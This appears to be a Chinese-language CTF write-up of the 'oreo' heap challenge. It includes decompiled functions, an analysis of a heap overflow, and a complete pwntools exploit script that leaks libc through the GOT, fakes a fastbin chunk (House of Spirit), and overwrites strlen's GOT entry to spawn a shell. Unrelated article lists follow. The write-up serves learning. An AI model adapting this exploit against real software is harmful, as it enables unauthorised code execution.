oreo程序下载

提取码:t4xx

程序分析

int __cdecl main()
{
leave_add = 0;
leave_del = 0;
leave_buf = (char *)&unk_804A2C0; ...
...
menu();
return 0;
}

main函数中先赋值了三个全局变量,这三个变量在.bss段是连续的

在这个程序中,没有setvbuf设置输出缓冲,在遇到printf 打印没有 '\n'的字符串时,可能不会输出到终端

ps:我在这里纠结了好久,我在python中 recv就是收不到东西,气skr人,(小白,菜)

下面看一个菜单中的第一个函数

通过这个函数的分析,把malloc出来的东西解析偏移,定义结构体,便于分析

struct Rifle
{
char description[25];
char name[27];
struct Rifle* fd;
} unsigned int new()
{
...
p = struct_P; //初始 struct_P 是等于0的
struct_P = (Rifle *)malloc(56);
if ( struct_P )
{
struct_P->fd = (int)p; //指向之前申请的内存
printf("Rifle name: ");
fgets(struct_P->name, 56, stdin); //堆溢出,这个位置可以修改结构中指向下个结构的指针
str_end_nul(struct_P->name); //没什么用的一个函数
printf("Rifle description: ");
fgets(struct_P->description, 56, stdin);
str_end_nul(struct_P->description);
++leave_add;
}
...
}

第二个函数:

unsigned int show_rifle()
{
... for ( i = struct_P; i; i = (Rifle *)i->fd )
{
printf("Name: %s\n", i->name);
printf("Description: %s\n", i); ...
}

在这个函数中,只要 i 不为0,就不会退出,i的赋值又是指向下一个结构

而在第一个结构可以修改fd这个位置,如果在new函数中,把fd指向got表中puts的地址

就可以 printf("Description: %s\n", i); 打印出puts 在libc中的地址,从而找到system的地址

第三个函数:

unsigned int del()
{
...
v2 = struct_P;
if ( leave_add )
{
while ( v2 )
{
ptr = v2;
v2 = (Rifle *)v2->fd;
free(ptr);
}
struct_P = 0;
++leave_del;
puts("Okay order submitted!");
}
...
}

在这个函数中,如果struct_P=0,就会结束,但是,在new函数中,我们可以修改v2->fd ,意思就是把这个0改成我们想要的位置,用来free 到fastbin中,malloc后,实现任意地址的修改

第4个函数:

unsigned int leave()
{
unsigned int v0; // ST1C_4
v0 = __readgsdword(0x14u);
printf("Enter any notice you'd like to submit with your order: ");
fgets(leave_buf, 128, stdin);
str_end_nul(leave_buf);
return __readgsdword(0x14u) ^ v0;
}

这个函数用来 向 leave_buf 写数据

而在main中 char *leave_buf = (char *)0x804A2C0;

如果把 leave_buf指向的位置改向got表 就可以修改got中的内容

利用代码

#!/usr/bin/env python
# -*- coding: UTF-8 -*-
from pwn import *
p = process('./oreo')
elf=ELF('./oreo')
libc = ELF("/lib/i386-linux-gnu/libc-2.23.so") #context.log_level='debug'
#context.terminal = ["tmux","splitw","-h"]
#context.arch = "i386" def add(name,description):
p.sendline('1')
p.sendline(name)
p.sendline(description) def show_rifle():
p.sendline('2')
p.recvuntil('Description: ')
p.recvuntil('Description: ')
return u32(p.recv(4).ljust(4,'\x00')) def del_all():
#gdb.attach(p,'b *0x8048855')
p.sendline('3')
p.recvuntil('Okay order submitted!\n') def leave(payload):
p.sendline('4')
p.sendline(payload) #1 leak出got表中已找到的地址
name='a'*27+p32(elf.got['puts'])
add(name,'0')
puts_addr= show_rifle()
success('1.puts_addr = '+hex(puts_addr)) #2得到system的地址
libc_base = puts_addr-libc.symbols['puts']
system_addr = puts_addr+libc.symbols['system']-libc.symbols['puts']
success('2.system_addr = '+hex(system_addr)) #3 伪造一个chunk
for i in range(0x40-2): #ps:为什么-2?前面已经add一次 后面我还要add一次
add('a'*27+p32(0),str(i))
leave_buf = 0x0804a2a8
payload = 'b'*27 + p32(leave_buf)
add(payload,'cccc')
#现在leave_add是0x40,fd又指向了&leave_add+4的位置,还差下一个chunk的size位 payload='\x00'*36+p32(100)#(leave_buf指向的地址-leave_buf)+36是下一个chunk的size位
leave(payload)
del_all() #ps: leave_buf=0x804A2C0
payload = p32(elf.got['strlen'])
add('bbb',payload)
#ps:这里是向char *leave_buf中写入数据,而现在 leave_buf=elf.got['strlen']
leave(p32(system_addr)+';/bin/sh\x00')
#elf.got['strlen']这个地址中原本是strlen的地址,现在改成了system的地址
p.interactive()

一开始我不会改got表,就直接在0x804A2C0伪造chunk 我认为这样方便,捣鼓了好长时间,结果,C了个呵呵的.....

House_Of_Spirit ctf oreo程序分析的更多相关文章

  1. APM程序分析-AC_WPNav.cpp

    APM程序分析 主程序在ArduCopter.cpp的loop()函数. /// advance_wp_target_along_track - move target location along ...

  2. 对Java数组中去除重复项程序分析

    我作为一个Java菜鸟,只会用简单的办法来处理这个问题.如果有大神看到,请略过,感激不尽! 所以首先先分析这道题目:数组中重复的数据进行删除,并且要让数组里的数据按原来的顺序排列,中间不能留空. 既然 ...

  3. (IOS)BaiduFM 程序分析

    本文主要分享下楼主在学习Swift编程过程中,对GitHub上的一个开源app BaiduFM的研究心得. 项目地址:https://github.com/belm/BaiduFM-Swift 一.项 ...

  4. Linux程序分析工具:ldd和nm

    ldd和nm是Linux下两个非常实用的程序分析工具.其中,ldd是用来分析程序运行时需要依赖的动态链接库的工具,nm是用来查看指定程序中的符号表信息的工具. 1 ldd 格式:ldd [option ...

  5. 二进制程序分析工具Pin在Windows系统中的安装和使用方法

    这篇日志其实很弱智,也是因为换了新电脑,实验环境不全(当然,做这个实验我是在虚拟机里,因为接下来想拿些恶意代码的数据),所以这里记录一下在Windows下怎么安装和使用Pin这个程序分析领域最常用的工 ...

  6. C#程序分析

    一.程序及问题 阅读下面程序,请回答如下问题: 问题1:这个程序要找的是符合什么条件的数? 问题2:这样的数存在么?符合这一条件的最小的数是什么? 问题3:在电脑上运行这一程序,你估计多长时间才能输出 ...

  7. linux程序分析工具

    ldd和nm是Linux下两个非常实用的程序分析工具.ldd是用来分析程序运行时需要依赖的动态链接库的工具,nm是用来查看指定程序中的符号表信息的工具,objdump用来查看源代码与汇编代码,-d只查 ...

  8. Codeforces 718A Efim and Strange Grade 程序分析

    Codeforces 718A Efim and Strange Grade 程序分析 jerry的程序 using namespace std; typedef long long ll; stri ...

  9. 代码实现:判断101-200之间有多少个素数(质数),并输出所有素数。 程序分析:判断素数的方法:用一个数分别去除2到sqrt(这个数),如果能被整除,则表明此数不是素数,反之是素数。

    package com.loaderman.Coding; /* 判断101-200之间有多少个素数(质数),并输出所有素数. 程序分析:判断素数的方法:用一个数分别去除2到sqrt(这个数),如果能 ...

随机推荐

  1. Parallel并行循环

    Parallel.For(, , new ParallelOptions() { MaxDegreeOfParallelism = 100 },(i, pls) => { ) { pls.Bre ...

  2. python中split()及os.path模块的使用方法

    返回path规范化的绝对路径path=os.path.abspath('test.py')print(path)输出 D:\Caps\test.pypath=os.path.abspath('D:\\ ...

  3. python中导入from appium import webdriver时报错:ModuleNotFoundError: No module named 'appium'

    1.检查一下有没有安装Appium-Python-Client,执行语句:pip install Appium-Python-Client进行安装 2.安装后,出现ModuleNotFoundErro ...

  4. linux常见的操作指令

    一:非正确退出程序,再次启动显示端口被占用 netstat -ntulp n ---  显示ip代替网络接口信息,显示出网络连接情况 t  ---  显示TCP协议的链接状况 u ---  显示UDP ...

  5. 基于gtid复制主要操作记录

    基于gtid复制主要操作记录 一.安装系统依赖包 在主从上都要安装该依赖包. yum -y install perl-DBI yum -y install perl-DBD-MySQL yum -y ...

  6. POJ 2492 A Bug's Life (带权并查集 && 向量偏移)

    题意 : 给你 n 只虫且性别只有公母, 接下来给出 m 个关系, 这 m 个关系中都是代表这两只虫能够交配, 就是默认异性, 问你在给出的关系中有没有与异性交配这一事实相反的, 即同性之间给出了交配 ...

  7. luogu P1063 能量项链 x

    P1063 能量项链 题目描述 在Mars星球上,每个Mars人都随身佩带着一串能量项链.在项链上有N颗能量珠.能量珠是一颗有头标记与尾标记的珠子,这些标记对应着某个正整数.并且,对于相邻的两颗珠子, ...

  8. sh_05_偶数求和

    sh_05_偶数求和 # 计算 0 ~ 100 之间 所有 偶数 的累计求和结果 # 开发步骤 # # 1. 编写循环 确认 要计算的数字 # 2. 添加 结果 变量,在循环内部 处理计算结果 # 1 ...

  9. Python与CSV文件(CSV模块)

    Python与CSV文件(CSV模块)   1.CSV文件 CSV(逗号分隔值)格式是电子表格和数据库最常用的导入和导出格式.没有“CSV标准”,因此格式由许多读写的应用程序在操作上定义.缺乏标准意味 ...

  10. 1.Python编程基础

    1. 其实,程序指的就是一系列指令,用来告诉计算机做什么,而编写程序的关键在于,我们需要用计算机可以理解的语言来提供这些指令. 虽然借助 Siri(Apple).Google Now(Android) ...